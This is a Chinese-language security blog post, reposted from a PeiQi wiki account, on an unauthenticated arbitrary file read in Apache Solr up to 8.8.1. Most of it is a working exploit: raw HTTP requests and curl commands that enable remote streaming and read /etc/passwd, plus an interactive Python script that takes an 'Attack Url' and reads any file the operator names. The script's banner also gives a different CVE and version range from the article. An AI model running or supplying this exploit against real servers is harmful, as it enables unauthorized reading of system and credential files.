Apache Solr 任意文件读取漏洞 1Day

admin
admin
admin
101089
文章
87
评论
2021年7月6日16:16:23评论97 views字数 4500阅读15分0秒阅读模式

Apache Solr 任意文件读取漏洞 1Day

:漏洞描述🐑


Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件


二:  漏洞影响🐇


Apache Solr <= 8.8.1


三:  漏洞复现🐋


访问 Solr Admin 管理员页面

Apache Solr 任意文件读取漏洞 1Day

获取core的信息

http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json


Apache Solr 任意文件读取漏洞 1Day

发送请求

Apache Solr 任意文件读取漏洞 1Day

请求包如下

POST /solr/ckan/config HTTP/1.1Host: xxx.xxx.xxx:8983Content-Length: 99Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://118.31.46.134:8983Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://118.31.46.134:8983/solr/ckan/configAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Connection: close
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true},"olrkzv64tv":"="}

再进行文件读取

Apache Solr 任意文件读取漏洞 1Day

POST /solr/ckan/debug/dump?param=ContentStreams HTTP/1.1Host: xxx.xxx.xxx.xxx:8983Content-Length: 29Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36Origin: http://118.31.46.134:8983Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://118.31.46.134:8983/solr/ckan/configAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Connection: close
stream.url=file:///etc/passwd

Apache Solr 任意文件读取漏洞 1Day


Curl请求为curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xxx.xxx.xxx.xxx:8983/solr/{corename}/config -H 'Content-type:application/json'curl "http://xxx.xxx.xxx.xxx:8983/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file://etc/passwd"


四:  漏洞POC🦉

POC还是建立在未授权访问的情况下

import requestsimport sysimport randomimport reimport base64import timefrom lxml import etreeimport jsonfrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():    print('+------------------------------------------')    print('+  33[34mPOC_Des: http://wiki.peiqi.tech           33[0m')    print('+  33[34mGithub : https://github.com/PeiQi0        33[0m')    print('+  33[34m公众号  : PeiQi文库                        33[0m')    print('+  33[34mVersion: Apache Solr < 8.2.0            33[0m')    print('+  33[36m使用格式: python3 CVE-2019-0193.py       33[0m')    print('+  33[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983  33[0m')    print('+  33[36mFile   >>> 文件名称或目录                  33[0m')    print('+------------------------------------------')
def POC_1(target_url):    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"    try:        response = requests.request("GET", url=core_url, timeout=10)        core_name = list(json.loads(response.text)["status"])[0]        print("33[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config33[0m")        return core_name    except:        print("33[31m[x] 目标Url漏洞利用失败33[0m")        sys.exit(0)
def POC_2(target_url, core_name):    vuln_url = target_url + "/solr/" + core_name + "/config"    headers = {        "Content-type":"application/json"    }    data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)        print("33[36m[o] 正在准备文件读取...... 33[0m".format(target_url))        if "This" in response.text and response.status_code == 200:            print("33[32m[o] 目标 {} 可能存在漏洞 33[0m".format(target_url))        else:            print("33[31m[x] 目标 {} 不存在漏洞33[0m".format(target_url))            sys.exit(0)
    except Exception as e:        print("33[31m[x] 请求失败 33[0m", e)
def POC_3(target_url, core_name, File_name):    vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)    headers = {        "Content-Type": "application/x-www-form-urlencoded"    }    data = 'stream.url=file://{}'.format(File_name)    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)        if "No such file or directory" in response.text:                print("33[31m[x] 读取{}失败 33[0m".format(File_name))        else:            print("33[36m[o] 响应为:n{} 33[0m".format(json.loads(response.text)["streams"][0]["stream"]))

    except Exception as e:        print("33[31m[x] 请求失败 33[0m", e)
if __name__ == '__main__':    title()    target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m"))    core_name = POC_1(target_url)    POC_2(target_url, core_name)    while True:        File_name = str(input("33[35mFile >>> 33[0m"))        POC_3(target_url, core_name, File_name)

Apache Solr 任意文件读取漏洞 1Day

四:  参考文章🐋

https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ




最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐

https://github.com/PeiQi0/PeiQi-WIKI-POC





本文始发于微信公众号(PeiQi文库):Apache Solr 任意文件读取漏洞 1Day

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月6日16:16:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Solr 任意文件读取漏洞 1Dayhttp://cn-sec.com/archives/294183.html

发表评论

匿名网友 填写信息